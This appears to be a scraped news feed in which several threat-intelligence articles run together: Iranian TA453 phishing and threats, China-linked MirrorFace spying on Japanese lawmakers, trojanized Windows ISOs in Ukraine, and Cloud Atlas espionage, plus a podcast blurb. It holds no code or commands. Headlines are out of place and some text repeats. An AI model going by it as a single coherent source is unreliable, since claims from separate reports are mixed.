"TA453 utilized multiple compromised email accounts, including those of a high-ranking military official, to deliver a link to the target," researchers explained. "The use of multiple compromised email accounts to target a single target is unusual for TA453. While each of the URLs observed were unique to each compromised email account, each linked to the domain gettogether\[.\]quest and pointed to the same threatening message in Hebrew."

The message read: "I'm sure you remember what I told you. Every email you get from your friends may be me and not someone who it claims. We follow you like your shadow, in Tel Aviv, in \[redacted\], in Dubai, in Bahrain. Take care of yourself."

**Updated Cyber-Targets for Charming Kitten**

Previous Charming Kitten email campaigns had almost always targeted academics, researchers, diplomats, dissidents, journalists, and human rights activists, using web beacons in message texts before eventually attempting to tap the target's credentials. Such campaigns can start with weeks of innocuous conversations on accounts created by the actors before launching the actual attack.

The new campaigns have targeted specific researchers in the medical field, an aerospace engineer, a real estate agent, and travel agents, among others, wrote Proofpoint researchers Joshua Miller and Crista Giering in a post this week.

In some cases, TA453 relies on a fictitious person, "Samantha Wolf," as bait. Proofpoint researchers first identified the persona in mid-March when the associated Gmail account was included in the bait content of a malicious document.

"Samantha's confrontational lures demonstrate an interesting attempt to generate engagement with targets not seen from other TA453 accounts," the report noted.

The Proofpoint report said it could state "with moderate confidence" that the more aggressive activity could represent collaboration with another branch of the Iranian state, including the IRGC Quds Force, which carries out physical operations.

In May, Israeli intelligence agency Shin Bet identified Iranian intelligence services' phishing activity designed to lure targets to kidnap them, Proofpoint noted.

"Based on the indicators provided, Proofpoint correlated this activity with TA453 campaigns from December 2021 in which campaigns attributed to TA453 used a spoofed email address of a reputable academic ... to give a researcher an 'Invitation to Zurich Strategic Dialogue Jan-2022,' " according to the report.

Iran-Backed Charming Kitten APT Eyes Kinetic Ops, Kidnapping

The MirrorFace group has deployed popular malware LodeInfo for spying and data theft against certain members of the Japanese House of Representatives.

The Chinese APT group MirrorFace attempted to influence the elections for the Japanese House of Representatives this year, an investigation has revealed.  

According to researchers at European IT security vendor ESET, the group used spear-phishing attacks on individual members of a political party. The research team, which calls the campaign Operation LiberalFace, found the fraudulent emails contained the well-known malware LodeInfo, a backdoor used to spread malware or steal credentials, documents, and emails from its victims.

MirrorFace is a Chinese-language threat actor that targets companies and organizations based in Japan. It launched the attack on June 29, 2022, before the Japanese elections in July.

Under the pretext of being the PR department of a Japanese political party, MirrorFace asked the recipients of the emails to share the attached videos on their own social media profiles. This was allegedly to further strengthen the party's perception and secure victory in the Chamber of Deputies.

The message also contains clear instructions on the publishing strategy for the videos and was supposedly sent in the name of a prominent politician.

**Malicious Attachments**

All spear-phishing messages contained a malicious attachment that, when executed, triggered the LodeInfo malware program on the compromised machine.

LodeInfo is a MirrorFace backdoor that is under continuous development. Its functions include taking screenshots, keylogging, terminating processes, exfiltrating data, executing additional malware, and encrypting certain files and folders.

The sophisticated and ever-evolving LodeInfo has earlier been deployed against media, diplomatic, government, public sector, and think-tank targets, according to researchers at Kaspersky, who have been tracking the malware family since 2019.

A previously undocumented credential stealer, named MirrorStealer by ESET Research, was also used in the attack. It's capable of stealing credentials from various applications such as browsers and email clients.

"During the Operation LiberalFace investigation, we managed to uncover further MirrorFace TTPs, such as the deployment and utilization of additional malware and tools to collect and exfiltrate valuable data from victims," wrote ESET researcher Dominik Breitenbacher. "Moreover, our investigation revealed that the MirrorFace operators are somewhat careless, leaving traces and making various mistakes."

There is speculation that this hacker group may be connected to APT10, but ESET could not find clear evidence of this or of cooperation with other APT groups in its analysis and is therefore pursuing MirrorFace as a separate entity.

The group reportedly primarily targets media, defense contractors, think tanks, diplomatic organizations, and academic institutions, with the goal of spying on and exfiltrating files of interest.

State-sponsored cyberattackers affiliated with China are actively building out a large network of attack infrastructure by compromising targets in the public and private spheres, according to a joint alert from the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the FBI.

The state-sponsored group RedAlpha APT, for example, has for years been targeting organizations working on behalf of the Uyghurs, Tibet, and Taiwan, looking to gather intel that could lead to human-rights abuses.

Chinese APT Group MirrorFace Interferes in Japanese Elections

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022.

Friday, December 16, 2022 09:12

In this episode of Talos Takes we are joined by Kendall McKay to discuss the recently released year in review report and dig deep on our activities in Ukraine. The year in review covers a vast amount of data and intel sources to identify some of the key trends we observed in 2022. Our activities in Ukraine have been well documented, in this episode we'll also talk more broadly about the trends and highlight some key findings from the past year.

This and all other episdoes are available on the Talos Takes podcast page and most major podcasting outlets.

Visit the Year in Review page for the full report, with topic summary reports, livestreams, podcasts, and other content starting December 14th.  New content will be added with each topic summary release through February.  You can access the full 2022 Cisco Talos Year in Review report directly here:

Talos Takes Ep. 122: Year in Review & Ukraine Activities

Government entities in Ukraine have been breached as part of a new campaign that leveraged trojanized versions of Windows 10 installer files to conduct post-exploitation activities.
Mandiant, which discovered the supply chain attack around mid-July 2022, said the malicious ISO files were distributed via Ukrainian- and Russian-language Torrent websites. It's tracking the threat cluster as UNC4166

Government entities in Ukraine have been breached as part of a new campaign that leveraged trojanized versions of Windows 10 installer files to conduct post-exploitation activities.

Mandiant, which discovered the supply chain attack around mid-July 2022, said the malicious ISO files were distributed via Ukrainian- and Russian-language Torrent websites. It's tracking the threat cluster as **UNC4166**.

"Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it," the cybersecurity company said in a technical deep dive published Thursday.

Although the adversarial collective's provenance is unknown, the intrusions are said to have targeted organizations that were previously victims of disruptive wiper attacks attributed to APT28, a Russian state-sponsored actor.

The ISO file, per the Google-owned threat intelligence firm, was designed to disable the transmission of telemetry data from the infected computer to Microsoft, install PowerShell backdoors, as well as block automatic updates and license verification.

The primary goal of the operation appears to have been information gathering, with additional implants deployed to the machines, but only after conducting an initial reconnaissance of the compromised environment to determine if it contains the intelligence of value.

These included Stowaway, an open source proxy tool, Cobalt Strike Beacon, and SPAREPART, a lightweight backdoor programmed in C, enabling the threat actor to execute commands, harvest data, capture keystrokes and screenshots, and export the information to a remote server.

In some instances, the adversary attempted to download the TOR anonymity browser onto the victim's device. While the exact reason for this action is not clear, it's suspected that it may have served as an alternative exfiltration route.

SPAREPART, as the name implies, is assessed to be a redundant malware deployed to maintain remote access to the system should the other methods fail. It's also functionally identical to the PowerShell backdoors dropped early on in the attack chain.

"The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest," Mandiant said.

**Cloud Atlas Strikes Russia and Belarus**

The findings come as Check Point and Positive Technologies disclosed attacks staged by an espionage group dubbed **Cloud Atlas** against the government sector in Russia, Belarus, Azerbaijan, Turkey, and Slovenia as part of a persistent campaign.

The hacking crew, active since 2014, has a track record of attacking entities in Eastern Europe and Central Asia. But since the outbreak of the Russo-Ukrainian war, it has been observed primarily targeting entities in Russia, Belarus, and Transnistria.

"The actors are also maintaining their focus on the Russian-annexed Crimean Peninsula, Lugansk, and Donetsk regions," Check Point said in an analysis last week.

Cloud Atlas, also called Clean Ursa, Inception, and Oxygen, remains unattributed to date, joining the likes of other APTs like TajMahal, DarkUniverse, and Metador. The group gets its name for its reliance on cloud services like OpenDrive to host malware and for command-and-control (C2).

Attack chains orchestrated by the adversary typically make use of phishing emails containing lure attachments as the initial intrusion vector, which ultimately lead to the delivery of a malicious payload via an intricate multi-stage sequence.

The malware then proceeds to initiate contact with an actor-controlled C2 server to retrieve additional backdoors capable of stealing files with specific extensions from the breached endpoints.

Attacks observed by Check Point, on the other hand, culminate in a PowerShell-based backdoor called PowerShower, which was first documented by Palo Alto Networks Unit 42 in November 2018.

Some of these intrusions in June 2022 also turned out to be successful, permitting the threat actor to gain full access to the network and use tools like Chocolatey, AnyDesk, and PuTTY to deepen their foothold.

"With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy and technology sectors, and on the annexed regions of Ukraine," Check Point added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel